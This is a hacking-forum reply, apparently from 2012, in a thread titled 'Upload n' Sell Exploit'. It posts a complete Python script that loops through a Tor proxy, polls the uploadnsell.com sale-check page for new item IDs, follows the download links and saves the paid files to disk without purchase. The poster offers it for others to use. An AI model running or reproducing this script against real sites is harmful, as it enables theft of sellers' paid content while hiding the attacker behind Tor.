Login Register


Upload n' Sell Exploit filter_list
Author
Message
RE: Upload n' Sell Exploit #4
Code:
import os, urllib2, random, time, re if not os.path.exists("files\\"): os.makedirs("files\\") itenNames = os.listdir("files\\") itemIDs = [] while True: try: opener = urllib2.build_opener(urllib2.ProxyHandler({"https":"localhost:8118"})) site = opener.open("http://uploadnsell.com/check-sale.php") itemID = site.read() site.close() if itemID not in itemIDs: itemIDs.append(itemID) site = opener.open("http://uploadnsell.com/download/%s"%itemID) link = re.search("<div class='linkbox'><ul><li><a href=\"(.*)\">",site.read()).group(1) site.close() site = opener.open(link) fname = re.search("attachment; filename=\"(.*)\"",site.headers["Content-Disposition"]).group(1) data = site.read() site.close() if data != "PQR6D-VTRBW-J4QR6-6XC7J-T8KBJ": if fname not in itenNames: itenNames.append(fname) if not os.path.exists("files\\%s\\"%fname): os.makedirs("files\\%s\\"%fname) f = open("files/%s/%s"%(fname,fname),"wb") f.write(data) f.close() print "Saved %s (ID %s)"%(fname,itemID) except Exception, err: print "ERR: %s" % str(err) time.sleep(30)

Configured to use my tor setup, feel free to edit the proxy to your liking. Will only save one copy of any file, and won't save some fake XBOX code someone loves to spam.

Reply





Messages In This Thread
Upload n' Sell Exploit - by The Protagonist - 09-25-2012, 10:19 PM
RE: Upload n' Sell Exploit - by The Protagonist - 09-27-2012, 11:56 PM
RE: Upload n' Sell Exploit - by Oni - 10-08-2012, 03:14 AM
RE: Upload n' Sell Exploit - by w00t - 10-08-2012, 03:41 PM
RE: Upload n' Sell Exploit - by The Protagonist - 10-09-2012, 04:56 PM
RE: Upload n' Sell Exploit - by Oni - 10-09-2012, 05:13 PM
RE: Upload n' Sell Exploit - by The Protagonist - 10-10-2012, 08:46 PM
RE: Upload n' Sell Exploit - by Ultimatum - 10-13-2012, 10:40 PM
RE: Upload n' Sell Exploit - by Oni - 10-16-2012, 06:28 AM
RE: Upload n' Sell Exploit - by Crimson - 10-18-2012, 12:34 AM
RE: Upload n' Sell Exploit - by Immortal - 10-27-2012, 03:57 PM
RE: Upload n' Sell Exploit - by The Protagonist - 10-28-2012, 02:27 PM
RE: Upload n' Sell Exploit - by Immortal - 10-28-2012, 04:23 PM
RE: Upload n' Sell Exploit - by w00t - 10-28-2012, 07:42 PM
RE: Upload n' Sell Exploit - by Felix The Cat - 11-23-2012, 08:09 PM



Users browsing this thread: 1 Guest(s)